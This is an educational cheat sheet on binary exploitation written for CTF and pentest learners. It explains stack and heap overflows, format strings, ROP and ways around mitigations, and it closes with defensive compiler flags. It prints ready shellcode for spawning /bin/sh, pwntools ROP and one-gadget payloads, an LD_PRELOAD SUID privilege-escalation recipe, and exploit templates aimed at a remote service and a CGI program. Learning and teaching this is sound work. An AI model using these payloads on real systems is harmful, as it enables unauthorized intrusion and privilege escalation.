Introduction to Binary Exploitation
Binary exploitation is the process of finding and leveraging vulnerabilities in compiled programs to achieve unauthorized behavior—typically gaining control of a system or escalating privileges. This field combines knowledge of computer architecture, operating systems, assembly language, and memory management to identify and exploit flaws in executable code. Understanding binary exploitation is crucial for both cybersecurity professionals seeking to secure systems and ethical hackers conducting penetration testing or participating in CTF (Capture The Flag) competitions.
Core Concepts and Terminology
Memory Layout
Section | Description | Permissions |
---|---|---|
Text/Code | Executable instructions | Read, Execute |
Data | Initialized global/static variables | Read, Write |
BSS | Uninitialized global/static variables | Read, Write |
Heap | Dynamic memory allocation | Read, Write |
Stack | Local variables, function calls | Read, Write |
Process Memory Map
High addresses ↑
+----------------+
| Command-line |
| arguments and |
| environment |
+----------------+
| Stack | ← Grows downward
| ↓ |
+----------------+
| ↑ |
| Heap | ← Grows upward
+----------------+
| Uninitialized |
| data (BSS) |
+----------------+
| Initialized |
| data |
+----------------+
| Text/Code |
+----------------+
Low addresses ↓
Important CPU Registers (x86/x86-64)
x86 Register | x86-64 Register | Purpose |
---|---|---|
EIP | RIP | Instruction Pointer |
ESP | RSP | Stack Pointer |
EBP | RBP | Base Pointer |
EAX, EBX, ECX, EDX | RAX, RBX, RCX, RDX | General Purpose Registers |
ESI, EDI | RSI, RDI | Source/Destination Index |
– | R8-R15 | Additional Registers (x86-64 only) |
Buffer Overflow Exploitation
Basic Buffer Overflow Concepts
- Stack Buffer Overflow: Occurs when data written to a buffer on the stack exceeds the allocated space
- Heap Buffer Overflow: Occurs when a buffer on the heap is overflowed
- Return Address Overwrite: Changing the saved return address on the stack to control execution flow
- Shellcode: Machine code that can be used as the payload in an exploit
Stack Buffer Overflow Example
// Vulnerable code
void vulnerable_function(char *input) {
char buffer[64];
strcpy(buffer, input); // No bounds checking!
}
int main(int argc, char *argv[]) {
vulnerable_function(argv[1]);
return 0;
}
Stack Layout During Function Call
High addresses ↑
+------------------+
| Function |
| arguments |
+------------------+
| Return address | ← Overwrite this to control execution flow
+------------------+
| Saved EBP/RBP |
+------------------+
| Local variables | ← Buffer starts here
| |
+------------------+
Low addresses ↓
Basic Exploitation Steps
- Identify vulnerability: Find buffer overflow opportunity
- Determine offset: Find exact bytes needed to reach return address
# Create patternmsf-pattern_create -l 100# Find offset from crashmsf-pattern_offset -q 0x41384142
- Craft payload: Shellcode + address to jump to
- Deliver exploit: Send crafted input to vulnerable program
Shellcode Examples
# Linux x86 - execve("/bin/sh", ["/bin/sh"], NULL) - 21 bytes
shellcode = (
b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
b"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)
# Linux x86-64 - execve("/bin/sh", ["/bin/sh"], NULL) - 27 bytes
shellcode = (
b"\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0"
b"\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53"
b"\x48\x89\xe7\xb0\x3b\x0f\x05"
)
Memory Corruption Techniques
Return-Oriented Programming (ROP)
ROP chains together existing code fragments (gadgets) ending in ret
instructions to execute arbitrary operations, bypassing non-executable stack protections.
Finding ROP Gadgets
# Using ROPgadget
ROPgadget --binary ./vulnerable_program --only "pop|ret"
# Using ropper
ropper --file ./vulnerable_program --search "pop rdi"
Simple ROP Chain Example (x86-64)
from pwn import *
# Addresses from binary
pop_rdi_ret = 0x4011cb
system_plt = 0x401030
bin_sh_str = 0x402000
# Craft ROP chain
payload = b"A" * 72 # Padding to reach return address
payload += p64(pop_rdi_ret) # Gadget: pop rdi; ret
payload += p64(bin_sh_str) # "/bin/sh" string address
payload += p64(system_plt) # system() function
Format String Vulnerabilities
Format string vulnerabilities occur when user input is directly used as the format string in functions like printf()
.
Example of Vulnerable Code
void vulnerable_function(char *input) {
printf(input); // Vulnerable - should be printf("%s", input)
}
Format String Attack Techniques
Information Leak: Reading from arbitrary memory
%x %x %x %x // Leak values from stack %s // Read string from memory address on stack
Memory Write: Writing to arbitrary memory
%n // Write number of bytes printed so far to address %hn // Write short integer %hhn // Write byte
Format String Exploit Example
# Write 0x41414141 to address 0xffffd8ac payload = p32(0xffffd8ac) # Address to write to payload += b"%16930112x" # Pad output to the desired value (0x41414141 - 4) payload += b"%1$n" # Write the number of characters output so far
Heap Exploitation
Heap Manager Basics
- malloc/free: C functions for dynamic memory allocation/deallocation
- Chunks: Basic unit of allocated memory
- Bins: Free chunk collections (fast, small, large, unsorted)
- Metadata: Information about chunk size, usage status
Common Heap Vulnerabilities
Use-After-Free (UAF): Using memory after it’s been freed
char *ptr = malloc(10); free(ptr); strcpy(ptr, "Exploited!"); // UAF vulnerability
Double Free: Freeing the same memory twice
char *ptr = malloc(10); free(ptr); free(ptr); // Double free vulnerability
Heap Overflow: Buffer overflow on heap-allocated memory
char *ptr = malloc(10); strcpy(ptr, "AAAAAAAAAAAAAAAAAA"); // Overflows allocated chunk
Heap Exploitation Techniques
- Heap Spray: Filling the heap with malicious code/data
- Fastbin Dup: Exploiting double-free to control allocations
- Unlink Exploit: Overwriting metadata to control execution
- House of Force: Manipulating the top chunk
- House of Orange: Creating overlapping chunks
Basic Heap Exploitation Example
# Simple UAF exploitation
from pwn import *
p = process('./vulnerable')
# Trigger allocation and free
p.sendline(b"alloc") # Allocate chunk
p.sendline(b"free") # Free chunk but program keeps the pointer
# Write malicious data to control flow
p.sendline(b"write") # Write to freed chunk
p.sendline(b"A" * 8 + p64(malicious_function))
# Trigger vulnerability
p.sendline(b"use") # Use chunk, triggering call through modified function pointer
Protection Mechanisms and Bypasses
Address Space Layout Randomization (ASLR)
Protection: Randomizes memory addresses to prevent hardcoding addresses in exploits.
Bypass Techniques:
- Memory leaks to determine runtime addresses
- Relative addressing if only partial ASLR
- Brute force (for limited randomization)
- Return to PLT/GOT (fixed addresses in some cases)
Data Execution Prevention (DEP) / NX
Protection: Marks memory regions as non-executable to prevent code execution from data sections.
Bypass Techniques:
- Return-Oriented Programming (ROP)
- Jump-Oriented Programming (JOP)
- Return-to-libc attacks
- Overwriting function pointers
Stack Canaries
Protection: Random values placed between buffer and control data to detect overwrites.
Bypass Techniques:
- Information leaks to read the canary value
- Format string attacks to reveal canary
- Overwriting byte-by-byte (if canary check leaks info)
- Alternative attack vectors (indirect overwrites)
Relocation Read-Only (RELRO)
Protection: Protects ELF sections like GOT from being overwritten.
Levels:
- Partial RELRO: GOT is writable but other sections protected
- Full RELRO: Entire GOT is read-only
Bypass Techniques:
- For Partial RELRO: GOT overwrite still possible
- Use other attack vectors when Full RELRO is enabled
Position Independent Executable (PIE)
Protection: Code is position-independent, loaded at random address.
Bypass Techniques:
- Memory leaks to determine base address
- Relative code reuse
- Brute force (limited effectiveness)
Exploitation Tools and Framework Usage
GDB Extensions
PEDA (Python Exploit Development Assistance)
gdb -q ./vulnerable gdb-peda$ pattern create 100 gdb-peda$ run `cat pattern` gdb-peda$ pattern search
GEF (GDB Enhanced Features)
gdb -q ./vulnerable gef➤ checksec gef➤ heap chunks gef➤ vmmap
pwndbg
gdb -q ./vulnerable pwndbg> disass main pwndbg> break *0x401234 pwndbg> context
Pwntools Framework (Python)
from pwn import *
# Configure context
context.arch = 'amd64'
context.log_level = 'debug'
# Connect to target
p = process('./vulnerable') # Local process
# p = remote('example.com', 1234) # Remote target
# Useful functions
elf = ELF('./vulnerable') # Load binary
libc = ELF('./libc.so.6') # Load library
# Address helpers
system_addr = elf.plt['system'] # PLT entry
binsh_addr = next(libc.search(b'/bin/sh\x00')) # Search for string
# Sending data
p.send(payload) # Send raw bytes
p.sendline(payload) # Send with newline
p.sendafter('Prompt: ', payload) # Wait for string then send
p.sendlineafter('Prompt: ', payload) # Wait for string then send with newline
# Receiving data
data = p.recv(nbytes=4) # Receive n bytes
data = p.recvline() # Receive until newline
data = p.recvuntil('marker') # Receive until specific bytes
data = p.clean() # Receive all available data
# Packing/unpacking addresses
addr_packed = p64(0x401234) # Pack as 64-bit value
addr_packed = p32(0x401234) # Pack as 32-bit value
value = u64(data.ljust(8, b'\x00')) # Unpack 64-bit value
value = u32(data.ljust(4, b'\x00')) # Unpack 32-bit value
# Interactive shell
p.interactive()
One Gadget RCE
Finding and using “one gadget RCE” (execve(‘/bin/sh’,…)) in libc:
# Find one gadget in libc
one_gadget libc.so.6
# Using one gadget in exploit
from pwn import *
p = process('./vulnerable')
libc = ELF('./libc.so.6')
# Leak libc base address (example)
p.recvuntil('Leak: ')
leak = int(p.recvline().strip(), 16)
libc_base = leak - libc.symbols['puts']
# Apply one gadget
one_gadget_offset = 0x4526a # From one_gadget output
one_gadget_addr = libc_base + one_gadget_offset
# Overwrite return address with one gadget
payload = b'A' * 64 # Padding
payload += p64(one_gadget_addr)
p.sendline(payload)
p.interactive()
Dynamic Analysis Techniques
Debugging Commands
Common GDB Commands
run [args] - Start program
break *0x12345 - Set breakpoint at address
break function_name - Set breakpoint at function
continue - Continue execution
step - Step into instruction
next - Step over instruction
finish - Run until current function returns
print $rax - Print register value
x/10wx $rsp - Examine memory (10 words in hex at rsp)
backtrace - Show call stack
info registers - Show all registers
disassemble main - Disassemble function
Memory Examination
x/10xg $rsp - Examine 10 giant words (8 bytes) in hex
x/20xw $rsp - Examine 20 words (4 bytes) in hex
x/40xh $rsp - Examine 40 half-words (2 bytes) in hex
x/80xb $rsp - Examine 80 bytes in hex
x/s $rdi - Examine memory as string
Tracing and Monitoring
ltrace – Library call tracer
ltrace ./vulnerable argument
strace – System call tracer
strace ./vulnerable argument
Valgrind – Memory analysis tool
valgrind --leak-check=full ./vulnerable argument
Binary Analysis Tools
Static Analysis
Ghidra – NSA’s reverse engineering framework
ghidra & # Launch GUI # Import binary and analyze
IDA Pro/Free – Interactive disassembler
ida64 vulnerable # Launch GUI
Radare2 – Reverse engineering framework
r2 ./vulnerable [0x004010a0]> aaa # Analyze all [0x004010a0]> afl # List functions [0x004010a0]> s main # Seek to main [0x004010a0]> pdf # Print disassembly
objdump – Disassemble binary files
objdump -d ./vulnerable # Disassemble objdump -M intel -d ./vulnerable # With Intel syntax
Dynamic Analysis Tools
QEMU – For cross-architecture analysis
qemu-arm -L /usr/arm-linux-gnueabi ./arm_vulnerable
checksec – Check binary protections
checksec --file=./vulnerable
gdbserver – Remote debugging
gdbserver localhost:1234 ./vulnerable arg1 arg2
Real-world Exploitation Scenarios
Privilege Escalation via SUID Binary
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Check for vulnerabilities
strings /usr/bin/vulnerable_suid
# Exploit environment variables for library hijacking
cd /tmp
echo 'int system(const char *cmd) { return execl("/bin/sh", "sh", NULL); }' > evil.c
gcc -shared -o evil.so evil.c -fPIC
LD_PRELOAD=/tmp/evil.so /usr/bin/vulnerable_suid
Web Application Binary Exploitation
CGI Binary Exploitation
# Send crafted request to vulnerable CGI curl -X POST "http://example.com/cgi-bin/vulnerable.cgi" \ -d "$(python -c 'print("A"*64 + "\xcb\x11\x40\x00\x00\x00\x00\x00")')"
Memory Corruption in Network Service
from pwn import * # Connect to service r = remote('vulnerable.com', 1337) # Send exploit r.send(b"A" * 64 + p64(system_addr) + p64(bin_sh_addr)) # Get shell r.interactive()
Defense and Mitigation Strategies
Compiler Protections
Enable all protections
gcc -o protected source.c -fstack-protector-all -pie -fPIE -Wl,-z,relro,-z,now
Key flags:
-fstack-protector-all
: Stack canaries-pie -fPIE
: Position Independent Executable-Wl,-z,relro,-z,now
: Full RELRO-D_FORTIFY_SOURCE=2
: Buffer overflow checks
Secure Coding Practices
Use safer functions:
strncpy()
instead ofstrcpy()
snprintf()
instead ofsprintf()
fgets()
instead ofgets()
Validate input lengths before processing
Memory safe languages where possible
Runtime Protections
Address Sanitizer (ASAN)
gcc -o sanitized source.c -fsanitize=address
Undefined Behavior Sanitizer (UBSAN)
gcc -o sanitized source.c -fsanitize=undefined
Advanced Topics
Return-to-dl-resolve
Technique to call arbitrary libc functions without needing their addresses.
from pwn import *
# Create a ret2dlresolve attack
rop = ROP(elf)
dlresolve = Ret2dlresolve(rop, symbol="system", args=["/bin/sh"])
# Build payload
payload = fit({
64: rop.ret, # Alignment
68: dlresolve.payload
})
p.sendline(payload)
SIGROP (Signal Return Oriented Programming)
Uses the kernel’s signal handling mechanism to control registers.
from pwn import *
context.arch = 'amd64'
# Create a sigreturn frame
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = bin_sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr
# Build payload
payload = b'A' * 64 + p64(syscall_addr) + bytes(frame)
Kernel Exploitation Basics
Finding kernel exploits
# Check kernel version uname -a # Check for kernel vulnerabilities searchsploit linux kernel 5.4
Basic steps for kernel exploitation:
- Prepare exploit code
- Compile for target kernel
- Execute to trigger vulnerability
- Escalate privileges
Practice Resources
CTF Platforms
- pwnable.kr
- pwnable.tw
- ROP Emporium
- Hack The Box
- CTFtime – Calendar of upcoming CTFs
Learning Resources
- Exploit Education
- LiveOverflow YouTube Channel
- Nightmare – Binary exploitation course
- How2Heap – Heap exploitation examples
Books and References
- “Hacking: The Art of Exploitation” by Jon Erickson
- “Practical Binary Analysis” by Dennis Andriesse
- “The Shellcoder’s Handbook” by Chris Anley et al.
Remember: Always practice binary exploitation legally and ethically. Only exploit systems you have permission to test, and follow responsible disclosure practices when discovering vulnerabilities in real-world software.